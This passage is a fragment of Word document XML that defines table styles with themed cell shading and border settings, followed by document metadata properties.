    <w:tblStylePr w:type="swCell">
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="114">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FFF" w:themeFill="background1"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="swCell">
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="115">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16">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17">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18">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19">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0">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1">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2">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styleId="123">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cPr>
        <w:shd w:val="clear" w:color="auto" w:fill="EDF2F8" w:themeFill="accen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FFF" w:themeFill="background1"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="124">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cPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8EDED" w:themeFill="accent2"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FFF" w:themeFill="background1"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="125">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cPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F8EE" w:themeFill="accent3"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FFF" w:themeFill="background1"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="126">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cPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2EFF5" w:themeFill="accent4"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FFF" w:themeFill="background1"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="127">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cPr>
        <w:shd w:val="clear" w:color="auto" w:fill="EDF6F9" w:themeFill="accent5"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FFF" w:themeFill="background1"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="128">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cPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FEF4EC" w:themeFill="accent6"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FFF" w:themeFill="background1"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="129">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0">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31">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32">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33">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34">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35">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36">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137">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38">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39">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0">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1">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2">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3">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4">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5">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6">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47">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8">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9">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0">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styleId="151">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2">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3">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4">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55">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56">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57">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58">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14:textFill>
          <w14:solidFill>
            <w14:schemeClr w14:val="tx1"/>
          </w14:solidFill>
        </w14:textFill>
      </w:rPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="B8CCE4" w:themeFill="accent1" w:themeFillTint="66"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:color w:val="FFFFFF" w:themeColor="background1"/>
        <w14:textFill>
          <w14:solidFill>
            <w14:schemeClr w14:val="bg1"/>
          </w14:solidFill>
        </w14:textFill>
      </w:rPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="366091" w:themeFill="accent1" w:themeFillShade="BF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>
        <w:color w:val="FFFFF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59">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14:textFill>
          <w14:solidFill>
            <w14:schemeClr w14:val="tx1"/>
          </w14:solidFill>
        </w14:textFill>
      </w:rPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E5B8B7" w:themeFill="accent2" w:themeFillTint="66"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:color w:val="FFFFFF" w:themeColor="background1"/>
        <w14:textFill>
          <w14:solidFill>
            <w14:schemeClr w14:val="bg1"/>
          </w14:solidFill>
        </w14:textFill>
      </w:rPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="943734" w:themeFill="accent2" w:themeFillShade="BF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>
        <w:color w:val="FFFFF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0">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14:textFill>
          <w14:solidFill>
            <w14:schemeClr w14:val="tx1"/>
          </w14:solidFill>
        </w14:textFill>
      </w:rPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D6E3BC" w:themeFill="accent3" w:themeFillTint="66"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:color w:val="FFFFFF" w:themeColor="background1"/>
        <w14:textFill>
          <w14:solidFill>
            <w14:schemeClr w14:val="bg1"/>
          </w14:solidFill>
        </w14:textFill>
      </w:rPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="76923C" w:themeFill="accent3" w:themeFillShade="BF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>
        <w:color w:val="FFFFF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1">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14:textFill>
          <w14:solidFill>
            <w14:schemeClr w14:val="tx1"/>
          </w14:solidFill>
        </w14:textFill>
      </w:rPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="CCC0D9" w:themeFill="accent4" w:themeFillTint="66"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:color w:val="FFFFFF" w:themeColor="background1"/>
        <w14:textFill>
          <w14:solidFill>
            <w14:schemeClr w14:val="bg1"/>
          </w14:solidFill>
        </w14:textFill>
      </w:rPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="5F497A" w:themeFill="accent4" w:themeFillShade="BF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>
        <w:color w:val="FFFFF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2">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14:textFill>
          <w14:solidFill>
            <w14:schemeClr w14:val="tx1"/>
          </w14:solidFill>
        </w14:textFill>
      </w:rPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="B6DDE8" w:themeFill="accent5" w:themeFillTint="66"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:color w:val="FFFFFF" w:themeColor="background1"/>
        <w14:textFill>
          <w14:solidFill>
            <w14:schemeClr w14:val="bg1"/>
          </w14:solidFill>
        </w14:textFill>
      </w:rPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="31849B" w:themeFill="accent5" w:themeFillShade="BF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>
        <w:color w:val="FFFFF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3">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14:textFill>
          <w14:solidFill>
            <w14:schemeClr w14:val="tx1"/>
          </w14:solidFill>
        </w14:textFill>
      </w:rPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FBD4B4" w:themeFill="accent6" w:themeFillTint="66"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:color w:val="FFFFFF" w:themeColor="background1"/>
        <w14:textFill>
          <w14:solidFill>
            <w14:schemeClr w14:val="bg1"/>
          </w14:solidFill>
        </w14:textFill>
      </w:rPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E36C09" w:themeFill="accent6" w:themeFillShade="BF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>
        <w:color w:val="FFFFF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16</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Usuario</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-02-28T08:52:24Z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2058-12.2.0.23196</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="ICV">
    <vt:lpwstr>AB3E60A8C8B6440DB71478883DB91811_12</vt:lpwstr>
  </property>
</Properties>
</file>